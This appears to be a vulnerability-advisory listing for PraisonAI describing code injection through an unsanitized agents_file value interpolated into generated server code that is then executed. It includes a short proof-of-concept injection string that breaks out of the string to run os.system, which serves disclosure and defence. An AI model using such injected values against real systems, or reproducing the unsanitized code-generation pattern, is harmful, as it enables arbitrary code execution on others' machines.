Disclosure summary
### Summary The `deploy/api.py` module generates Python server code by directly interpolating the `agents_file` parameter into an f-string that is then written to a file and executed via `subprocess.Popen()`. An attacker who controls the `agents_file` value (via CLI argument, configuration, or upstream API) can inject arbitrary Python code. ### Details `src/praisonai/praisonai/deploy/api.py` (line 80): ```python code = f'''... praisonai = PraisonAI(agent_file="{agents_file}") ... "agent_file": "{agents_file}" ...''' ``` The generated code is then executed (line 190): ```python subprocess.Popen(['python', server_file]) ``` `agents_file` is never sanitized or validated. A malicious value breaks out of the string context: ```python agents_file = '"); import os; os.system("id"); #' # Generated code becomes: # praisonai = PraisonAI(agent_file=""); import os; os.system("id"); #") ``` The same pattern exists in `deploy/docker.py` (line 33) for Dockerfile generation. ### PoC ```python # The injection: agents_file = '"); import os; os.system("id"); #' # What the generated code looks like: template = f'praisonai = PraisonAI(agent_file="{agents_file}")' print(template) # Output: praisonai = P
Source-specific records & product guidance
Sources retain their own attribution and scoring. Follow the original record to confirm affected versions, fixed releases, and configuration conditions.
GitHub Reviewed Security Advisories · GHSA-g6j7-pffp-8whg
Open original source · Updated Oct 07, 2026
PraisonAI: Code Injection via f-string Interpolation in Deploy API Server Generation
Source severity: CRITICAL / 0
| Ecosystem | Package | Affected range | First patched |
|---|---|---|---|
| pip | PraisonAI | 4.6.78 |
Original records & references
- NIST NVD record
- CVE Program record
- github.com — Reviewed advisory
PUBLISHED 2026-10-07T12:05:53-04:00
MODIFIED 2026-10-07T12:05:54-04:00
INGESTED 2026-10-08T12:05:11-04:00